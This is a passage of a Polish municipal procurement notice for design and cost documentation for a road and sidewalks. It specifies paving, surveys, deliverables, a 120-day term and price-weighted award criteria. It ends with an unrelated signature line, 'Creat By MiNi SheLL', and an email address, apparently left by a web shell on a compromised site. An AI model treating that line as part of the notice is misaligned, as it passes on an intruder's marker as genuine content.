na wysokości UMiG parking z kostki betonowej , miejsca parkingowe wydzielone kostką granitową + chodnik z kostki granitowej na długości budynku urzędu .

Długość drogi około 850,00 mb ( od ul. Kościuszki wzdłuż parku miejskiego , terenu Ośrodka Kultury Fizycznej dalej za basen miejski około 50,0 mb  ) ,

chodniki :  
wymiana  części  chodników wzdłuż ul. Mickiewicza , ( miejsca będą wskazane przez Inwestora ) .
chodnik z kostki wibroprasowanej gr. 8 cm w kolorze szarym , zjazdy na posesję gr. 8 cm w kolorze grafitowym na konstrukcji odpowiadającym warunkom terenowym ,
szerokość chodników 1,5-2,0 m i długości około 710,00 mb będzie konsultowana na bieżąco podczas opracowania dokumentacji .


Opracowanie dokumentacji projektowo-kosztorysowej będzie zawierać:
mapę do celów opiniodawczych,
pomiary poprzeczne co 25,00 mb i pomiar podłużny , 
dokumentacja projektowa 
projekt tymczasowej organizacji ruchu na czas realizacji zadania wraz z uzgodnieniem   z jednostką zarządzającą ruchem drogowym potwierdzonym wydanym postanowieniem , 
dokumentacja projektowa w zakresie niezbędnym do zgłoszenia robót nie wymagających pozwolenia na budowę - 7 egz.,
kosztorysy inwestorskie  - 2 egz.
specyfikacje techniczne wykonania i odbioru robót - 2 egz.
założenia do  informacji dotyczącej  bezpieczeństwa i ochrony zdrowia (BiOZ) - 2 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com